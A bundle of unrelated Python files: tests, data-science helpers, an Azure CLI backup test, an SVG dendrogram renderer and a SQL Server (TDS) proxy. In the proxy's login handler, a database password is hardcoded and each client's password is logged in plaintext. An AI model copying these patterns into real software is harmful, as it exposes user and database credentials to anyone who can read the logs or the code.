with patch("salt.utils.verify._get_pwnam", return_value=(None, None, 0, 0)), patch(
"os.getuid", return_value=0
), patch("os.listdir", return_value=["subdir"]), patch(
"os.path.isdir", return_value=True
), patch(
"salt.utils.path.os_walk",
return_value=[
(
"/tmp/salt-dir",
["dir1", "dir2", ".dir3", "dir4"],
["file1", "file2", ".file3", "file4"],
)
],
):
# verify this runs without issues, even though FNFE is raised
salt.utils.verify.verify_env(["/tmp/salt-dir"], "root", skip_extra=True)
# and verify it got actually called with the valid paths
mock_stat.assert_any_call("/tmp/salt-dir/file1")
mock_stat.assert_any_call("/tmp/salt-dir/dir1")
mock_stat.assert_any_call("/tmp/salt-dir/file4")
mock_stat.assert_any_call("/tmp/salt-dir/dir4")
mock_chown.assert_any_call("/tmp/salt-dir/file4", 0, 0)
mock_chown.assert_any_call("/tmp/salt-dir/dir4", 0, 0)
|
"""Generate a 256-bit private key."""
import sys
import secrets
argv = sys.argv
error_msg = "Must confirm by running: python gen_key.py [KEY_FILE_PATH] confirm"
if len(argv) > 2:
if argv[2] == "confirm":
try:
with open(argv[1], "w") as f:
print("A new key is generated at %s" % argv[1])
print(secrets.token_urlsafe(32), file=f)
except Exception as e:
print(e)
else:
print(error_msg)
else:
print(error_msg)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Purpose: check whether the provided function returns True for at least one element of the list.
Explanation:
    Combine any() with map() to check whether fn returns True for any element of the list.
"""
def some(lst, fn=lambda x: x):
return any(map(fn, lst))
# Examples
print(some([0, 1, 2, 0], lambda x: x >= 2))
print(some([0, 0, 1, 0]))
# output:
# True
# True
|
#!/usr/bin/env python3
#
# This file is part of Magnum.
#
# Copyright © 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2019,
# 2020, 2021, 2022 Vladimír Vondruš <mosra@centrum.cz>
# Copyright © 2020 janos <janos.meny@googlemail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
from numpy import genfromtxt
def format(filename):
data = genfromtxt(filename, delimiter=',')
formatted = ''
data = data[1:,1:].astype(int)
formatted = ''
for i in range(256//4):
line = ' '
for j in range(4):
row = data[4*i+j]
line += '{{{:>3}, {:>3}, {:>3}}}, '.format(row[0], row[1], row[2])
formatted = formatted + line + '\n'
# Strip trailing comma and newline
return formatted[:-3]
# The two CSV files taken from https://www.kennethmoreland.com/color-advice/
print("/* Generated with Implementation/cool-warm.py */")
print("constexpr UnsignedByte CoolWarmSmooth[][3] = {\n", end='')
print(format('smooth-cool-warm-table-byte-0256.csv'))
print("};\n")
print("/* Generated with Implementation/cool-warm.py */")
print("constexpr UnsignedByte CoolWarmBent[][3] = {\n", end='')
print(format('bent-cool-warm-table-byte-0256.csv'))
print("};\n")
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import typing
if typing.TYPE_CHECKING:
from google.cloud import bigquery
def get_routine(routine_id: str) -> "bigquery.Routine":
# [START bigquery_get_routine]
from google.cloud import bigquery
# Construct a BigQuery client object.
client = bigquery.Client()
# TODO(developer): Set the fully-qualified ID for the routine.
# routine_id = "my-project.my_dataset.my_routine"
routine = client.get_routine(routine_id) # Make an API request.
print("Routine '{}':".format(routine.reference))
print("\tType: '{}'".format(routine.type_))
print("\tLanguage: '{}'".format(routine.language))
print("\tArguments:")
for argument in routine.arguments:
print("\t\tName: '{}'".format(argument.name))
print("\t\tType: '{}'".format(argument.data_type))
# [END bigquery_get_routine]
return routine
|
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
"""
Creating two dataframes, for the second and third models,
and using them to plot model performance.
"""
def plot_model_pref(folder="plots", name="Model performance", bf=False):
# the dataframes
df = pd.DataFrame([[0.98, "full", "NN, micro"], [0.83, "full", "RF, micro"],
[0.64, "missing", "NN, micro"], [0.5, "missing", "RF, micro"],
[0.59, "full", "NN, macro"], [0.5, "full", "RF, macro"],
[0.51, "missing", "NN, macro"], [0.3, "missing", "RF, macro"]
],
columns=["F1 score", "Data", "Model and type"])
df_better_feat = pd.DataFrame([[0.98, "full", "NN, micro"], [0.82, "full", "RF, micro"],
[0.62, "missing", "NN, micro"], [0.51, "missing", "RF, micro"],
[0.63, "full", "NN, macro"], [0.53, "full", "RF, macro"],
[0.51, "missing", "NN, macro"], [0.3, "missing", "RF, macro"]
],
columns=["F1 score", "Data", "Model and type"])
df_dict = {True: df_better_feat, False: df}
fig, ax = plt.subplots()
# drawing the bar plots and adding labels and a title.
ax = sns.barplot(data=df_dict[bf], y="F1 score", x="Model and type", hue="Data", palette="mako")
ax.set_xlabel(color='r', xlabel="Model and type")
ax.set_ylabel(color='r', ylabel="F1 score")
ax.set_title(name)
# saving.
plt.savefig(f"{folder}/{name}.png")
"""
Plotting the clustering model performance
"""
def plot_clustering_pref(folder="plots", name="Cluster performance"):
# the data of the model performance.
df = pd.DataFrame([[0.266, "Spectral clustering"], [0.264, "DBSCAN"],
[0.17, "GMM"], [0.162, "KMeans"],],
columns=["Silhouette score", "Clustering model"])
fig, ax = plt.subplots()
# drawing the bar plots and adding labels and a title.
ax = sns.barplot(data=df, y="Silhouette score", x="Clustering model", color="teal")
ax.set_xlabel(color='r', xlabel="Clustering Model")
ax.set_ylabel(color='r', ylabel="Silhouette score")
ax.set_title(name)
# saving.
plt.savefig(f"{folder}/{name}.png")
if __name__ == "__main__":
plot_clustering_pref()
plot_model_pref(bf=True, name="Better features model performance")
plot_model_pref()
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long
# pylint: disable=unused-import
def setup(test):
# import time
test.kwargs.update({
"vaultName": "cli-test-new-vault",
"rg": "sarath-rg",
"diskname": "cli-test-disk-new",
"restorediskname": "cli-test-disk-new-restored",
"policyname": "diskpolicy"
})
account_res = test.cmd('az account show').get_output_in_json()
vault_res = test.cmd('az dataprotection backup-vault create '
'-g "{rg}" --vault-name "{vaultName}" -l centraluseuap '
'--storage-settings datastore-type="VaultStore" type="LocallyRedundant" --type SystemAssigned',
checks=[]).get_output_in_json()
disk_response = test.cmd('az disk create -g "{rg}" -n "{diskname}" --size-gb 4').get_output_in_json()
test.kwargs.update({
"principalId": vault_res["identity"]["principalId"],
"diskid": disk_response["id"],
"rgid": "/subscriptions/" + account_res["id"] + "/resourceGroups/sarath-rg"
})
# run the below commands only in record mode
# time.sleep(180)
# test.cmd('az role assignment create --assignee "{principalId}" --role "Disk Backup Reader" --scope "{diskid}"')
# test.cmd('az role assignment create --assignee "{principalId}" --role "Disk Snapshot Contributor" --scope "{rgid}"')
# test.cmd('az role assignment create --assignee "{principalId}" --role "Disk Restore Operator" --scope "{rgid}"')
def create_policy(test):
policy_json = test.cmd('az dataprotection backup-policy get-default-policy-template --datasource-type AzureDisk').get_output_in_json()
test.kwargs.update({"policyjson": policy_json})
test.cmd('az dataprotection backup-policy create -n "{policyname}" --policy "{policyjson}" -g "{rg}" --vault-name "{vaultName}"')
policy_id = test.cmd('az dataprotection backup-policy show -g "{rg}" --vault-name "{vaultName}" -n "{policyname}" --query "id"').get_output_in_json()
test.kwargs.update({"policyid": policy_id})
lifecycle_json = test.cmd('az dataprotection backup-policy retention-rule create-lifecycle'
' --count 12 --type Days --source-datastore OperationalStore').get_output_in_json()
test.kwargs.update({"lifecycle": lifecycle_json})
policy_json = test.cmd('az dataprotection backup-policy retention-rule set '
' --name Daily --policy "{policyjson}" --lifecycles "{lifecycle}"').get_output_in_json()
test.kwargs.update({"policyjson": policy_json})
criteria_json = test.cmd('az dataprotection backup-policy tag create-absolute-criteria --absolute-criteria FirstOfDay').get_output_in_json()
test.kwargs.update({"criteria": criteria_json})
policy_json = test.cmd('az dataprotection backup-policy tag set '
' --name Daily --policy "{policyjson}" --criteria "{criteria}"').get_output_in_json()
test.kwargs.update({"policyjson": policy_json})
schedule_json = test.cmd('az dataprotection backup-policy trigger create-schedule --interval-type Hourly --interval-count 6 --schedule-days 2021-05-02T05:30:00').get_output_in_json()
test.kwargs.update({"repeating_time_interval": schedule_json[0]})
policy_json = test.cmd('az dataprotection backup-policy trigger set '
' --policy "{policyjson}" --schedule "{repeating_time_interval}"').get_output_in_json()
test.kwargs.update({"policyjson": policy_json})
test.cmd('az dataprotection backup-policy create -n diskhourlypolicy --policy "{policyjson}" -g "{rg}" --vault-name "{vaultName}"')
def trigger_disk_backup(test):
# import time
response_json = test.cmd('az dataprotection backup-instance adhoc-backup -n "{backup_instance_name}" -g "{rg}" --vault-name "{vaultName}" --rule-name BackupHourly --retention-tag-override Default').get_output_in_json()
job_status = None
test.kwargs.update({"backup_job_id": response_json["jobId"]})
while job_status != "Completed":
# run the below code only in record mode
# time.sleep(10)
job_response = test.cmd('az dataprotection job show --ids "{backup_job_id}"').get_output_in_json()
job_status = job_response["properties"]["status"]
if job_status not in ["Completed", "InProgress"]:
raise Exception("Undefined job status received")
def trigger_disk_restore(test):
# import time
rp_json = test.cmd('az dataprotection recovery-point list --backup-instance-name "{backup_instance_name}" -g "{rg}" --vault-name "{vaultName}"').get_output_in_json()
test.kwargs.update({"rp_id": rp_json[0]["name"]})
split_disk_id = test.kwargs["diskid"].split("/")
split_disk_id[-1] = test.kwargs["restorediskname"]
restore_disk_id = "/".join(split_disk_id)
test.kwargs.update({"restore_disk_id": restore_disk_id})
restore_json = test.cmd('az dataprotection backup-instance restore initialize-for-data-recovery'
' --datasource-type AzureDisk --restore-location centraluseuap --source-datastore OperationalStore '
'--recovery-point-id "{rp_id}" --target-resource-id "{restore_disk_id}"').get_output_in_json()
test.kwargs.update({"restore_request": restore_json})
test.cmd('az dataprotection backup-instance validate-for-restore -g "{rg}" --vault-name "{vaultName}" -n "{backup_instance_name}" --restore-request-object "{restore_request}"')
response_json = test.cmd('az dataprotection backup-instance restore trigger -g "{rg}" --vault-name "{vaultName}"'
' -n "{backup_instance_name}" --restore-request-object "{restore_request}"').get_output_in_json()
job_status = None
test.kwargs.update({"backup_job_id": response_json["jobId"]})
while job_status != "Completed":
# run the below code only in record mode
# time.sleep(10)
job_response = test.cmd('az dataprotection job show --ids "{backup_job_id}"').get_output_in_json()
job_status = job_response["properties"]["status"]
if job_status not in ["Completed", "InProgress"]:
raise Exception("Undefined job status received")
def configure_backup(test):
import time
backup_instance_guid = "b7e6f082-b310-11eb-8f55-9cfce85d4fae"
backup_instance_json = test.cmd('az dataprotection backup-instance initialize --datasource-type AzureDisk'
' -l centraluseuap --policy-id "{policyid}" --datasource-id "{diskid}"').get_output_in_json()
backup_instance_json["properties"]["policy_info"]["policy_parameters"]["data_store_parameters_list"][0]["resource_group_id"] = test.kwargs["rgid"]
backup_instance_json["backup_instance_name"] = test.kwargs['diskname'] + "-" + test.kwargs['diskname'] + "-" + backup_instance_guid
test.kwargs.update({
"backup_instance_json": backup_instance_json,
"backup_instance_name": backup_instance_json["backup_instance_name"]
})
test.cmd('az dataprotection backup-instance create -g "{rg}" --vault-name "{vaultName}" --backup-instance "{backup_instance_json}"')
backup_instance_res = test.cmd('az dataprotection backup-instance list -g "{rg}" --vault-name "{vaultName}" --query "[0].properties.protectionStatus"').get_output_in_json()
protection_status = backup_instance_res["status"]
while protection_status != "ProtectionConfigured":
# run the below line only in record mode
# time.sleep(10)
backup_instance_res = test.cmd('az dataprotection backup-instance list -g "{rg}" --vault-name "{vaultName}" --query "[0].properties.protectionStatus"').get_output_in_json()
protection_status = backup_instance_res["status"]
# run the below line only in record mode
time.sleep(30)
def delete_backup(test):
test.cmd('az dataprotection backup-instance delete -g "{rg}" --vault-name "{vaultName}" -n "{backup_instance_name}" --yes')
def cleanup(test):
delete_backup(test)
test.cmd('az dataprotection backup-vault delete '
' -g "{rg}" --vault-name "{vaultName}" --yes')
test.cmd('az disk delete --name "{diskname}" --resource-group "{rg}" --yes')
test.cmd('az disk delete --name "{restorediskname}" --resource-group "{rg}" --yes')
def call_scenario(test):
setup(test)
try:
create_policy(test)
configure_backup(test)
trigger_disk_backup(test)
trigger_disk_restore(test)
except Exception as e:
raise e
finally:
cleanup(test)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on April 2020
@author: Thomas Bonald <bonald@enst.fr>
"""
from typing import Iterable, Optional
import numpy as np
from sknetwork.hierarchy.postprocess import cut_straight
from sknetwork.visualization.colors import STANDARD_COLORS
def get_index(dendrogram, reorder=True):
"""Index nodes for pretty dendrogram."""
n = dendrogram.shape[0] + 1
tree = {i: [i] for i in range(n)}
for t in range(n - 1):
i = int(dendrogram[t, 0])
j = int(dendrogram[t, 1])
left: list = tree.pop(i)
right: list = tree.pop(j)
if reorder and len(left) < len(right):
tree[n + t] = right + left
else:
tree[n + t] = left + right
return list(tree.values())[0]
def svg_dendrogram_top(dendrogram, names, width, height, margin, margin_text, scale, line_width, n_clusters,
color, colors, font_size, reorder, rotate_names):
"""Dendrogram as SVG image with root on top."""
# scaling
height *= scale
width *= scale
# positioning
labels = cut_straight(dendrogram, n_clusters, return_dendrogram=False)
index = get_index(dendrogram, reorder)
n = len(index)
unit_height = height / dendrogram[-1, 2]
unit_width = width / n
height_basis = margin + height
position = {index[i]: (margin + i * unit_width, height_basis) for i in range(n)}
label = {i: l for i, l in enumerate(labels)}
width += 2 * margin
height += 2 * margin
if names is not None:
text_length = np.max(np.array([len(str(name)) for name in names]))
height += text_length * font_size * .5 + margin_text
svg = """<svg width="{}" height="{}" xmlns="http://www.w3.org/2000/svg">""".format(width, height)
# text
if names is not None:
for i in range(n):
x, y = position[i]
x -= margin_text
y += margin_text
text = str(names[i]).replace('&', ' ')
if rotate_names:
svg += """<text x="{}" y="{}" transform="rotate(60, {}, {})" font-size="{}">{}</text>""" \
.format(x, y, x, y, font_size, text)
else:
y += margin_text
svg += """<text x="{}" y="{}" font-size="{}">{}</text>""" \
.format(x, y, font_size, text)
# tree
for t in range(n - 1):
i = int(dendrogram[t, 0])
j = int(dendrogram[t, 1])
x1, y1 = position.pop(i)
x2, y2 = position.pop(j)
l1 = label.pop(i)
l2 = label.pop(j)
if l1 == l2:
line_color = colors[l1 % len(colors)]
else:
line_color = color
x = .5 * (x1 + x2)
y = height_basis - dendrogram[t, 2] * unit_height
svg += """<path stroke-width="{}" stroke="{}" d="M {} {} {} {}" />"""\
.format(line_width, line_color, x1, y1, x1, y)
svg += """<path stroke-width="{}" stroke="{}" d="M {} {} {} {}" />"""\
.format(line_width, line_color, x2, y2, x2, y)
svg += """<path stroke-width="{}" stroke="{}" d="M {} {} {} {}" />"""\
.format(line_width, line_color, x1, y, x2, y)
position[n + t] = (x, y)
label[n + t] = l1
svg += '</svg>'
return svg
def svg_dendrogram_left(dendrogram, names, width, height, margin, margin_text, scale, line_width, n_clusters,
color, colors, font_size, reorder):
"""Dendrogram as SVG image with root on left side."""
# scaling
height *= scale
width *= scale
# positioning
labels = cut_straight(dendrogram, n_clusters, return_dendrogram=False)
index = get_index(dendrogram, reorder)
n = len(index)
unit_height = height / n
unit_width = width / dendrogram[-1, 2]
width_basis = width + margin
position = {index[i]: (width_basis, margin + i * unit_height) for i in range(n)}
label = {i: l for i, l in enumerate(labels)}
width += 2 * margin
height += 2 * margin
if names is not None:
text_length = np.max(np.array([len(str(name)) for name in names]))
width += text_length * font_size * .5 + margin_text
svg = """<svg width="{}" height="{}" xmlns="http://www.w3.org/2000/svg">""".format(width, height)
# text
if names is not None:
for i in range(n):
x, y = position[i]
x += margin_text
y += unit_height / 3
text = str(names[i]).replace('&', ' ')
svg += """<text x="{}" y="{}" font-size="{}">{}</text>""" \
.format(x, y, font_size, text)
# tree
for t in range(n - 1):
i = int(dendrogram[t, 0])
j = int(dendrogram[t, 1])
x1, y1 = position.pop(i)
x2, y2 = position.pop(j)
l1 = label.pop(i)
l2 = label.pop(j)
if l1 == l2:
line_color = colors[l1 % len(colors)]
else:
line_color = color
y = .5 * (y1 + y2)
x = width_basis - dendrogram[t, 2] * unit_width
svg += """<path stroke-width="{}" stroke="{}" d="M {} {} {} {}" />"""\
.format(line_width, line_color, x1, y1, x, y1)
svg += """<path stroke-width="{}" stroke="{}" d="M {} {} {} {}" />"""\
.format(line_width, line_color, x2, y2, x, y2)
svg += """<path stroke-width="{}" stroke="{}" d="M {} {} {} {}" />"""\
.format(line_width, line_color, x, y1, x, y2)
position[n + t] = (x, y)
label[n + t] = l1
svg += '</svg>'
return svg
def svg_dendrogram(dendrogram: np.ndarray, names: Optional[np.ndarray] = None, rotate: bool = False, width: float = 400,
height: float = 300, margin: float = 10, margin_text: float = 5, scale: float = 1,
line_width: float = 2, n_clusters: int = 2, color: str = 'black', colors: Optional[Iterable] = None,
font_size: int = 12, reorder: bool = False, rotate_names: bool = True,
filename: Optional[str] = None):
"""Return SVG image of a dendrogram.
Parameters
----------
dendrogram :
Dendrogram to display.
names :
Names of leaves.
rotate :
If ``True``, rotate the tree so that the root is on the left.
width :
Width of the image (margins excluded).
height :
Height of the image (margins excluded).
margin :
Margin.
margin_text :
Margin between leaves and their names, if any.
scale :
Scaling factor.
line_width :
Line width.
n_clusters :
Number of coloured clusters to display.
color :
Default SVG color for the dendrogram.
colors :
SVG colors of the clusters of the dendrogram (optional).
font_size :
Font size.
reorder :
If ``True``, reorder leaves so that left subtree has more leaves than right subtree.
rotate_names :
If ``True``, rotate names of leaves (only valid if **rotate** is ``False``).
filename :
Filename for saving image (optional).
Example
-------
>>> dendrogram = np.array([[0, 1, 1, 2], [2, 3, 2, 3]])
>>> from sknetwork.visualization import svg_dendrogram
>>> image = svg_dendrogram(dendrogram)
>>> image[1:4]
'svg'
"""
if colors is None:
colors = STANDARD_COLORS
elif isinstance(colors, dict):
colors = np.array(list(colors.values()))
elif isinstance(colors, list):
colors = np.array(colors)
if rotate:
svg = svg_dendrogram_left(dendrogram, names, width, height, margin, margin_text, scale, line_width, n_clusters,
color, colors, font_size, reorder)
else:
svg = svg_dendrogram_top(dendrogram, names, width, height, margin, margin_text, scale, line_width, n_clusters,
color, colors, font_size, reorder, rotate_names)
if filename is not None:
with open(filename + '.svg', 'w') as f:
f.write(svg)
return svg
|
import datetime
import hashlib
import bs4
# XXX We may want to suppress soupsieve warning later on
def fill_header(src_filename, dst_filename):
"""Populate HTML <header></header> of file specified by dst_filename."""
filename = src_filename
hashsum = sha256sum(src_filename)
timezone = datetime.timezone.utc
timestamp = datetime.datetime.now(timezone)
with open(dst_filename, 'r', encoding='utf-8') as file:
html = bs4.BeautifulSoup(file, features='html.parser')
filename_tag = html.new_tag('p')
filename_tag['id'] = 'filename'
filename_tag.string = f'File: {filename}'
hashsum_tag = html.new_tag('p')
hashsum_tag.string = f'Hash (SHA256): {hashsum}'
timestamp_tag = html.new_tag('p')
timestamp_tag.string = f'Time (UTC): {timestamp}'
header = html.header
header.append(filename_tag)
header.append(hashsum_tag)
header.append(timestamp_tag)
with open(dst_filename, 'w', encoding='utf-8') as file:
file.write(html.prettify())
file.truncate()
def sha256sum(filename):
"""Return the SHA256 string representation of file specified by filename."""
CHUNK_SIZE = 65536
sha256 = hashlib.sha256()
with open(filename, 'rb') as file:
while True:
chunk = file.read(CHUNK_SIZE)
if not chunk:
break
sha256.update(chunk)
return sha256.hexdigest()
def main():
# XXX Usage example
src = r'%LOCALAPPDATA%\Packages\Facebook.FacebookMessenger_8xx8rvfyw5nnt\LocalState\msys_100047488492327.db'
dst = r'%USERPROFILE%\Desktop\stub.html'
fill_header(src, dst)
if __name__ == '__main__':
main()
|
import pandas as pd
import numpy as np
import scipy.stats as ss
def cramers_v(confusion_matrix: np.ndarray) -> float:
"""
Calculate Cramers V statistic for categorial-categorial association.
uses correction from Bergsma and Wicher,
Journal of the Korean Statistical Society 42 (2013): 323-328
:param confusion_matrix: Input table of values.
:return: Correlation of values in input confusion_matrix. Close to 1 - strong association,
close to 0 - weak association.
"""
chi2 = ss.chi2_contingency(confusion_matrix)[0]
n = confusion_matrix.sum()
phi2 = chi2 / n
r, k = confusion_matrix.shape
phi2corr = max(0, phi2 - ((k-1)*(r-1))/(n-1))
rcorr = r - ((r-1)**2)/(n-1)
kcorr = k - ((k-1)**2)/(n-1)
return np.sqrt(phi2corr / min((kcorr-1), (rcorr-1)))
def execute_cramers(input_df: pd.DataFrame, column: str, column_to_compare_with: str) -> float:
"""
Function to execute Cramers V and check input variables.
:param input_df: Dataframe, which function gets columns from.
:param column: Name of the input column.
:param column_to_compare_with: Name of the input column.
:return: Calls cramers_v function and returns its return value.
"""
if (isinstance(column_to_compare_with, str)) and (isinstance(column, str)):
if (input_df.get(column) is not None) and (input_df.get(column_to_compare_with) is not None):
            confusion_matrix = pd.crosstab(input_df[column], input_df[column_to_compare_with]).to_numpy()
else:
raise Exception('Cannot execute Cramers V, because at least one of input columns does not exist.')
else:
raise Exception('Cannot execute Cramers V, because at least one input column has wrong variable type.')
return cramers_v(confusion_matrix)
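# Minimal usage sketch (illustrative only): build a tiny categorical frame and
# report the association between its two columns. The column names below are
# made up for the demonstration.
if __name__ == '__main__':
    demo_df = pd.DataFrame({
        'colour': ['red', 'red', 'blue', 'blue', 'red', 'blue'],
        'size': ['S', 'S', 'L', 'L', 'S', 'L'],
    })
    print(execute_cramers(demo_df, 'colour', 'size'))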
|
import logging
from datetime import datetime
from io import BytesIO
from socket import socket
from time import time
from bunch import Bunch
import user
from pool import manager
from tds import mq
from tds.exceptions import AbortException
from tds.packets import PacketHeader
from tds.request import LoginRequest
from tds.request import PreLoginRequest
from tds.request import SQLBatchRequest
from tds.response import LoginResponse
from tds.tokens import Collation
from tds.tokens import DoneStream
from tds.tokens import EnvChangeStream
from tds.tokens import InfoStream
from tds.tokens import LoginAckStream
from tds.tokens import PreLoginStream
from tds.tokens import parse_tokens
EVENT_LOGIN = "login"
EVENT_LOGOUT = "logout"
EVENT_INPUT = "input"
EVENT_OUTPUT = "output"
EVENT_BATCH = "batch"
class Parser(object):
"""
:type conn: socket
"""
    PROCESS = {
        0x01: 'on_batch',     # SQL batch request
        0x10: 'on_login',     # TDS7 login request
        0x12: 'on_pre_login'  # pre-login handshake
    }
PACKET_HEADER_LENGTH = 8
conn = None
user = None
client_ip = None
database = None
db_conn = None
settings = {}
def __init__(self, conn, address, logger=None):
self.logger = logger or logging.getLogger(__name__)
self.conn = conn
self.client_ip = address[0]
def run(self):
while True:
try:
header, data = self.parse_message_header()
if header.packet_type in self.PROCESS:
method = getattr(self, self.PROCESS.get(header.packet_type))
method(header, data)
else:
logging.error('Unknown packet: %s', header.packet_type)
self.on_transfer(header, data)
except AbortException as e:
self.logger.exception(e)
self._send_logout_event()
break
def parse_message_header(self, conn=None):
"""
:param socket conn:
:rtype: (PacketHeader, BytesIO)
"""
conn = conn or self.conn
header = conn.recv(self.PACKET_HEADER_LENGTH)
if len(header) < self.PACKET_HEADER_LENGTH:
# TODO(benjamin): process disconnection
raise AbortException()
packet_header = PacketHeader()
packet_header.unmarshal(header)
length = packet_header.length - self.PACKET_HEADER_LENGTH
data = None
if length:
data = conn.recv(length)
return packet_header, BytesIO(data)
def on_pre_login(self, header, buf):
"""
:param PacketHeader header:
:param BytesIO buf:
"""
request = PreLoginRequest(buf)
response = PreLoginStream()
response.version = (1426128904, 0)
response.encryption = PreLoginStream.ENCRYPT_NOT_SUP
response.inst_opt = ''
response.thread_id = 1234
header = PacketHeader()
content = header.marshal(response)
self.conn.sendall(content)
def on_login(self, header, buf):
"""
:param PacketHeader header:
:param BytesIO buf:
"""
packet = LoginRequest(buf)
info = user.login(packet.username, packet.password)
if info is None:
# TODO(benjamin): process login failed
pass
self.settings = {
"user": "CTIDbo",
"password": "Dev@CTIdb0",
"instance": "S1DSQL04\\EHISSQL",
"database": "CTI",
"ip": "S1DSQL04",
"port": 1433
}
self.user = packet.username
self.database = packet.database
self._send_login_event()
logging.error('logging password %s', packet.password)
response = LoginResponse()
env1 = EnvChangeStream()
env1.add(1, 'CTI', 'master')
sql_collation = Collation()
env2 = EnvChangeStream()
env2.add_bytes(EnvChangeStream.ENV_SQL_COLLATION, sql_collation.marshal())
env3 = EnvChangeStream()
env3.add(EnvChangeStream.ENV_LANGUAGE, 'us_english')
ack = LoginAckStream()
ack.program_name = "TDS"
env = EnvChangeStream()
env.add(EnvChangeStream.ENV_DATABASE, '4096', '4096')
done = DoneStream()
info = InfoStream()
info.msg = "Changed database context to 'CTI'."
info.server_name = 'S1DSQL04\\EHISSQL'
info.line_number = 10
response.add_component(env1)
response.add_component(info)
response.add_component(ack)
response.add_component(env)
response.add_component(done)
header = PacketHeader()
content = header.marshal(response)
self.conn.sendall(content)
def on_batch(self, header, buf):
"""
:param PacketHeader header:
:param BytesIO buf:
:return:
"""
cur = time()
request = SQLBatchRequest(buf)
self.on_transfer(header, buf)
elapse = time() - cur
        logging.error('batch sql elapse %s : %s', elapse, request.text)
# TODO(benjamin): process batch error
self._send_batch_event(elapse, request.text, error=None)
def on_transfer(self, header, buf, parse_token=False):
"""
:param PacketHeader header:
:param BytesIO buf:
:param bool parse_token:
:rtype: [StreamSerializer]
"""
message = header.marshal(buf)
pool = manager.get_connection(self.settings)
with pool.get() as conn:
conn.sendall(message)
self._send_input_event(message)
header, response_buf = self.parse_message_header(conn)
message = header.marshal(response_buf)
self.conn.sendall(message)
self._send_output_event(message)
items = parse_tokens(response_buf)
def _make_event(self, event):
stamp = datetime.now().strftime('%Y%m%d%H%M%S%f')[:-3]
return Bunch(event=event,
user=self.user,
database=self.database,
client_ip=self.client_ip,
stamp=stamp)
def _send_output_event(self, message):
event = self._make_event(event=EVENT_OUTPUT)
event.size = len(message)
mq.send(event)
def _send_input_event(self, message):
event = self._make_event(event=EVENT_INPUT)
event.size = len(message)
mq.send(event)
def _send_batch_event(self, elapse, text, error):
event = self._make_event(event=EVENT_BATCH)
event.elapse = elapse
event.text = text
event.error = error
mq.send(event)
def _send_login_event(self):
event = self._make_event(event=EVENT_LOGIN)
mq.send(event)
def _send_logout_event(self):
event = self._make_event(event=EVENT_LOGOUT)
mq.send(event)
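# A minimal, illustrative accept loop (not part of the original module): hand
# each incoming TCP connection to a Parser. The bind address, the port and the
# thread-per-connection model are assumptions made for this sketch only.
if __name__ == '__main__':
    import threading
    listener = socket()
    listener.bind(('0.0.0.0', 1433))
    listener.listen(5)
    while True:
        client_conn, client_addr = listener.accept()
        worker = threading.Thread(target=Parser(client_conn, client_addr).run)
        worker.daemon = True
        worker.start()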
|
from __future__ import unicode_literals
from django.db import models
from authentication.models import Account
class Post(models.Model):
id = models.AutoField(primary_key=True)
author = models.ForeignKey(Account)
barcode = models.TextField()
latitud = models.TextField()
longitud = models.TextField()
timestamp = models.TextField()
created_at = models.DateField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def __unicode__(self):
return '{0}'.format(self.barcode)
|
# Copyright 2020 John Dorn
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file implements concepts from the HTTP/1.1 specification
# (RFC 2616, https://www.ietf.org/rfc/rfc2616.txt)
class ParseError(Exception):
""" Raised on parsing failure. """
pass
class HTTPVersion:
""" Representation of an HTTP protocol version, eg. HTTP/1.1 """
@staticmethod
def parse(string):
""" Parse an HTTP version string into major and minor parts.
string: str -- string representation of HTTP version
eg. 'HTTP/1.1' --> HTTPVersion(1, 1)
Returns new HTTPVersion(major, minor)
Raises ValueError if the format is invalid.
"""
# Separate out the major and minor versions
if not string.startswith('HTTP/'): raise ValueError()
parts = string[len('HTTP/'):].split('.')
if len(parts) != 2: raise ValueError()
# Convert them to integers
return HTTPVersion(*map(int, parts))
def __init__(self, major, minor):
""" Create representation of HTTP version {major}.{minor}.
major: int -- major component of version
minor: int -- minor component of version
Raises ValueError if either component is negative.
"""
if major < 0 or minor < 0: raise ValueError()
self.major = major
self.minor = minor
def __eq__(self, other):
return (isinstance(other, HTTPVersion)
and self.major == other.major
and self.minor == other.minor)
def __str__(self):
return 'HTTP/' + str(self.major) + '.' + str(self.minor)
def __bytes__(self):
return bytes(str(self), encoding='ascii')
def __repr__(self):
return 'HTTPVersion(' + str(self.major) + ', ' + str(self.minor) + ')'
class Message:
